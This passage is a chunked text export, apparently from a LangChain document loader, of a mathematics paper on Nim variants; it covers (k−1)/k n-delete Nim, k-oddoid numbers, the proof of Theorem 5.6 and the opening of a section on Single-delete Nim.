+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
228
+ page_content=' , zm+1 are odd, (b) For any l, if zl is even, then 2s ≤ zl.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
229
+ page_content=' This theorem is a special case of Theorem 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
230
+ page_content='6 in the next subsection, so the proof is omitted.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
231
+ page_content=' 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
232
+ page_content='3 k−1 k n-delete nim We consider a generalization of Half-delete Nim.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
233
+ page_content=' Definition 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
234
+ page_content='3 (k−1 k n-delete Nim).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
235
+ page_content=' There are n (= km) heaps of tokens.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
236
+ page_content=' The player performs the following two operations in succession on his/her turn.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
237
+ page_content=' Selects (k − 1)m heaps and deletes them.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
238
+ page_content=' Splits each of the remaining m heaps into k heaps.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
239
+ page_content=' In particular, if k = 2, this game is the same as Half-delete Nim, and if k = n, this game is the same as ABO-delete Nim.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
240
+ page_content=' Definition 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
241
+ page_content='4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
242
+ page_content=' A positive integer whose remainder divided by k(k − 1) lies between 1 and k − 1 is called a k-oddoid number, and any other positive integer is called a k-evenoid number.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
243
+ page_content=' A heap with an oddoid number of tokens is called a k-oddoid heap, and a heap with an evenoid number of tokens is called a k-evenoid heap.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
244
+ page_content=' 7 In particular, if k = 2, oddoid and evenoid numbers are consistent with the usual notion of odd and even numbers.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
245
+ page_content=' Lemma 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
246
+ page_content='5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
247
+ page_content=' (1) It is not possible to split an k-oddoid number into k k-oddoid numbers.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
248
+ page_content=' (2) All integers x between k and k(k − 1) can be split into k integers that are between 1 and k − 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
249
+ page_content=' (3) Let s be a positive integer.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
250
+ page_content=' Every k-evenoid number y < ks can be split into k k-oddoid numbers which are less than ks−1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
251
+ page_content=' Proof.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
252
+ page_content=' (1) We can prove this in the similar way to (i) in the proof of Theorem 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
253
+ page_content='2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
254
+ page_content=' That is, if we can split a k-oddoid number into k k-oddoid number, then we have a contradiction because the sum of reminders of all k-oddoid numbers split by k(k − 1) is between k and k(k − 1), which contradicts to the original number is an k-oddoid number.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
255
+ page_content=' (2) Let x = kp + q (0 ≤ q ≤ k − 1).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
256
+ page_content=' Then, 1 ≤ p ≤ k − 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
257
+ page_content=' If p < k − 1, then x = q(p + 1) + (k − q)p and if p = k − 1, then x = kp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
258
+ page_content=' Thus, for both cases, x can be split into k numbers which are between 1 and k − 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
259
+ page_content=' (3) Since ks − k can be divided by k(k − 1), the reminder of ks divided by k(k − 1) is k.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
260
+ page_content=' Thus, the largest k-evenoid number less than ks is ks − k.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
261
+ page_content=' Therefore, for the case s ≤ 2, we have proved in (2).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
262
+ page_content=' Assume that s ≥ 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
263
+ page_content=' ks − k = k(ks−2 − 1) k − 1 k(k − 1) + k(k − 1) and k(ks−2−1) k−1 is an integer, so for a k-evenoid number y < ks, y = αk(k − 1) + β � α ≤ k(ks−2 − 1) k − 1 , k ≤ β ≤ k(k − 1) � and we can split α into α1, α2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
264
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
265
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
266
+ page_content=' , αk ≤ ks−2−1 k−1 .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
267
+ page_content=' From (2), we can also split β into 1 ≤ β1, β2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
268
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
269
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
270
+ page_content=' , βk ≤ k − 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
271
+ page_content=' Let γi = αik(k − 1) + βi for any 1 ≤ i ≤ k,then γ1, γ2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
272
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
273
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
274
+ page_content=' , γk are all k-oddoid numbers, γ1 +γ2 +· · ·+γk = y, and γi ≤ ks−2−1 k−1 k(k − 1) + k − 1 < ks−1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
275
+ page_content=' Using this lemma, we can give the following winning strategy for k−1 k n- delete Nim by replacing the odd and even heaps of Theorem 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
276
+ page_content='2 with k- oddoid and k-evenoid heaps, respectively.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
277
+ page_content=' 8 Theorem 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
278
+ page_content='6.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
279
+ page_content=' Let Z = ⟨z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
280
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
281
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
282
+ page_content=' , zkm⟩ be the k−1 k n-delete nim position, where each zi is the number of tokens and zi < zi+1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
283
+ page_content=' Let ks be the smallest power of k greater than z(k−1)m+1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
284
+ page_content=' Then Z is a P-position if and only if z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
285
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
286
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
287
+ page_content=' , zkm satisfy both of the following two conditions: (a) all z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
288
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
289
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
290
+ page_content=' , z(k−1)m+1 are k-oddoid, (b) For any l, if zl is k-evenoid, then ks ≤ zl.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
291
+ page_content=' Proof.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
292
+ page_content=' Let P be the set of positions which satisfy both (a) and (b), and N be the complement of P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
293
+ page_content=' We show a position in P has no option in P in (i), and a position in N has at least one option in P in (ii) and (iii).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
294
+ page_content=' (i) Assume that in a move of k−1 k n-delete Nim, the remaining all m heaps are k-oddoid heaps.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
295
+ page_content=' Then from Lemma 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
296
+ page_content='5 (1), one can obtain at most k−1 k-oddoid heaps by splitting a remaining heap.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
297
+ page_content=' Thus, each option is not in P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
298
+ page_content=' Therefore, if an option of a position in P is also in P, a k-evenoid heap has to be split into k k-oddoid heaps.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
299
+ page_content=' At least one k-oddoid heap after this split has more than ks−1 stones.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
300
+ page_content=' On the other hand, the player has to split at least one of the heaps whose sizes are z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
301
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
302
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
303
+ page_content=' , z(k−1)m+1, but any k-evenoid heap from this split has less than ks stones, which contradicts to (b).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
304
+ page_content=' (ii) Assume that (a) is not satisfied.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
305
+ page_content=' That is, there exists a k-evenoid zi (1 ≤ i ≤ (k − 1)m + 1).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
306
+ page_content=' Let s be an integer such that ks−1 ≤ zi < ks.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
307
+ page_content=' Since zi is a k-evenoid number, s ≥ 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
308
+ page_content=' Consider to split i-th heap and (k − 1)m + 2, (k − 1)m + 3, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
309
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
310
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
311
+ page_content=' , km-th heaps.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
312
+ page_content=' From Lemma 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
313
+ page_content='5(3), zi can be split into k k-oddoid heaps less than ks−1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
314
+ page_content=' If zj(j ≥ (k − 1)m + 2) is a k- evenoid number, then let zj = αk(k − 1) + β(k ≤ β ≤ k(k − 1)).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
315
+ page_content=' Then, from Lemma 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
316
+ page_content='5(2), zj can be split into β1, β2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
317
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
318
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
319
+ page_content=' , βk−1, αk(k − 1) + βk, where 1 ≤ β1, β2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
320
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
321
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
322
+ page_content=' , βk ≤ k.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
323
+ page_content=' If zj(j ≥ (k −1)m+2) is a k-oddoid number, then zj can be split into 1, 1, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
324
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
325
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
326
+ page_content=' , 1, zj−(k−1).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
327
+ page_content=' Here, all ks−1, ks−1+1, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
328
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
329
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
330
+ page_content=' , ks−1+k−2 are k-evenoid number, so if ks−1 ≤ zi < zj and zj is a k-evenoid number, then ks−1 ≤ zj − (k − 1).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
331
+ page_content=' Therefore, for a position, if (a) is not satisfied, then the position has an option in P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
332
+ page_content=' (iii) Consider the case that (a) is satisfied but (b) is not satisfied.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
333
+ page_content=' That is, z1, z2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
334
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
335
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
336
+ page_content=' , z(k−1)m+1 are k-oddoid numbers and there exists zi(i > (k−1)m+ 1) such that zi is a k-evenoid number and zi < ks.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
337
+ page_content=' Split the heaps whose sizes are z(k−1)m+1, z(k−1)m+2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
338
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
339
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
340
+ page_content=' , zkm as follows: From Lemma 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
341
+ page_content='5(3), zi can be split into k k-oddoid numbers less than ks−1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
342
+ page_content=' For other zj, similar to (ii), if zj is a k-evenoid number, then it can be split into β1, β2, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
343
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
344
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
345
+ page_content=' , βk−1, αk(k−1)+βk and if zj is a k-oddoid number, then it can be split into 1, 1, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
346
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
347
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
348
+ page_content=' , 1, zj−(k−1).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
349
+ page_content=' 9 Thus, for a position, if (a) is satisfied but (b) is not satisfied, then the position has an option in P.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
350
+ page_content=' 6 Single-delete Nim Finally, in this section, we consider Single-delete Nim.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
351
+ page_content=' In this ruleset, the player can remove only one heap.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
352
+ page_content=' 6.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
353
+ page_content='1 The rule of Single-delete Nim Definition 6.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
354
+ page_content='1 (Single-delete Nim).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
355
+ page_content=' There are n heaps of tokens.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
356
+ page_content=' The player performs the following two operations in succession on his/her turn.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
357
+ page_content=' Selects one heap and deletes it.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
358
+ page_content=' Selects one heap of the remaining n − 1 heaps and splits it into two heaps.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
359
+ page_content=' If n = 2, then the ruleset is the same as VDN, so this ruleset is a generalization of VDN.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
360
+ page_content=' The terminal position in Single-delete Nim is only ⟨1, 1, .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
361
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
362
+ page_content=' .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
363
+ page_content=' , 1⟩.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
364
+ page_content=' 6.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
365
+ page_content='2 Characterizing positions in Single-delete Nim Theorem 6.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
366
+ page_content='2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
367
+ page_content=' If n = 3 in the Single-delete Nim, the position ⟨x, y, z⟩ is a P-position if and only if v2(x) = v2(y) = v2(z).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
368
+ page_content=' This result was introduced in Sakai [5].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
369
+ page_content=' This theorem is a special case of Theorem 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
370
